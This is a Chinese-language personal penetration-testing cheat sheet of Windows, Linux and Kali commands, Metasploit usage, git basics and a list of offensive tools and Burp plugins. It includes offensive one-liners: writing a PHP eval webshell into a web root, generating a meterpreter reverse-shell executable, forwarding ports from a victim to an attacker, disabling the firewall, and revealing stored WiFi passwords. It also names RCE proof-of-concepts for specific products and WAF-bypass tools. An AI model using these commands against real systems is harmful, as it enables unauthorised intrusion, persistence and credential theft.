前言
备忘录分为:技巧、命令、工具,三大类别。
旨在记录常用、好用的知识,便于快速翻阅查找,节省时间。
技巧篇
1.webshell 上传
(1)Windows 命令行写入 shell
1 | echo ^<?php @eval($_POST[1]);?^>> ./WWW/shell.php |
操作系统篇
1. Windows
(1)查看并杀死某个进程
1 | tasklist |
(2) 查看本机网络连接情况
1 | netstat -ano|findstr 本机ip |
(3) RDP
1 | #开启 RDP |
(4) 防火墙
netsh
查看防火墙状态
1 | netsh firewall show state |
开启防火墙
1 | netsh firewall set opmode enable |
关闭防火墙
1 | netsh firewall set opmode disable |
设置防火墙日志路径
1 | netsh advfirewall set currentprofile logging filename "C:\Windows\firewall.log" |
添加防火墙规则
1 | netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=tcp localport=3389 允许 3389 端口 |
删除防火墙规则
1 | netsh advfirewall firewall delete rule name="rule_name" |
添加端口规则
1 | netsh firewall portopening tcp 1234 rule_name |
删除端口规则
1 | netsh firewall delete portopening tcp 1234 |
添加程序规则
1 | netsh firewall add allowedprogram "C:\\nc.exe" "allow nc" enable |
删除程序规则
1 | netsh firewall delete allowedprogram "C:\\nc.exe" |
添加端口转发
1 | netsh interface portproxy add v4tov4 [listenaddress=victim_ip] listenport=victim_port connectaddress=attack_ip connectport=attack_port |
删除端口转发
1 | netsh interface portproxy delete v4tov4 [listenaddress=victim_ip] listenport=victim_port |
查看端口转发
1 | netsh interface portproxy show all |
安装 IPv6
1 | netsh interface ipv6 install |
查看无线网络信息
1 | netsh wlan show profiles |
查看指定 WIFI 密码
1 | netsh wlan show profiles wifi_name key=clear |
(5) 改变字符编码,修复乱码
1 | chcp 65001 |
(6) ,
代替空格
1 | dir,c:\ |
(7)查找具有某内容的 asp 文件
1 | findstr /n /s /i "某某网站" C:\*.asp |
(8) 查找C盘上的某个文件
1 | dir /a/b/s C:\test.png |
2. Linux
查找某个文件:flag.txt
1 | find / | grep flag.txt 2>/dev/null |
查找具有某内容的php文件
1 | find /var/www/html/ -name "*.php" | xargs grep "某某网站" |
3. Kali
(1) 远程登录
1 | rdesktop ip |
工具篇
1. msfvenom
(1)生成 http 反弹 shell
1 | msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port -f exe -o re.exe |
2. msfconsole
(1) 监听 http reverse shell
1 | msfconsole |
3. github
3.1 常规操作
1 | git add . |
3.2 git fetch 和 git merge 合并远程和本地的更新(更加安全)
1 | git remote add origin git@github.com:xxx/xxx.git |
3.3 git pull 可以先切换到本地的另一个分支,拉取更新,然后再合并到本地分支,再提交
1 | git remote add origin git@github.com:xxx/xxx.git |
网站篇
个人武器库
1. 补充 Goby Poc
拓尔思_mas_rce
H3C_IMC_RCE
TVT数码科技 NVMS-1000 路径遍历漏洞 CVE-2019-20085
昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞
中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞
eGroupWare spellchecker.php 远程命令执行漏洞
齐治堡垒机 gui_detail_view.php 任意用户登录漏洞
华天动力OA 8000版 workFlowService SQL注入漏洞
2. 个人常用工具
推荐一个工具,可以自己去 DIY 集成下方工具,免去繁琐的查找打开工具过程
我自己也 DIY 了一个工具,目前在用这个:
(1) 渗透测试
BurpSuite
Awvs https://www.fahai.org/index.php/archives/24/comment-page-1#comments
Goby
fofaviewer
(2) 内网渗透
Cobaltstrike
fscan
(3) 数据库利用
sqlmap
(4) Web 扫描
dirsearch
御剑目录扫描
OneForAll
Packer-Fuzzer
JsFinder
(6) Webshell 管理
Godzila
冰蝎
(7) 搜索引擎
Fofa
Zoomeye
3. burp+chrome拓展
重点是几个被动扫描插件,避免了繁琐的手工测试。
burpsuite
BurpFastJsonScan — BurpFastJsonScan,一款基于BurpSuite的被动式FastJson检测插件源处
HaE — 一款使用Java开发的信息高亮标记与提取插件,比之前介绍过的两款(BurpSuite-Xkeys和IntelligentAnalysis-SSTVINFO)体验要好一点(需要手动写检测规则,内置只有一个邮箱的检测规则)。源处
BurpShiroPassiveScan —一款基于BurpSuite的被动式shiro检测插件,目前有两大功能1.shiro框架指纹检测 2.shiro加密key检测 源处
domain_hunter_pro —domain_hunter的高级版本,SRC挖洞、HW打点之必备 源处
BurpSuite_403Bypasser —用python编写的用来测试绕过403的插件。源处
sqlmap4burp++.0.2.jar —多平台无需外部依赖的burp联动sqlmap插件,使用也很简单,导入在burp拦截的请求里或者重放都可以直接发送到sqlmap4burp界面,第一次需要选择sqlmap.py文件位置进行设置,详细的可以看飘雪表哥-c0ny1源处。
captcha-killer-modified — captcha-killer的修改版,主要用于验证码爆破,适配新版Burpsuite,支持 dddocr 调用 源处
passive-scan-client-0.1-jar-with-dependencies.jar — Burp被动扫描流量转发插件,比如搭配长亭的
XRAY
来进行被动扫描,借用群里表哥的话:挂着坐收洞。详细说明chunked-coding-converter.0.2.1.jar 国人c0ny1最新版 burp分块输出,也是对抗waf的插件
chrome插件
- 检测web蜜罐 - anti-honeypot
- 油猴 - Tampermonkey
- Adblock Plus - 免费的广告拦截器
- Momentum - 标签页
- Octotree - GitHub code tree
- OneTab - 节省高达95%的内存,并减轻标签页混乱现象
- Proxy SwitchyOmega - 轻松快捷地管理和切换多个代理设置。
firefox插件:
Script Blocker Ultimate
阻止脚本执行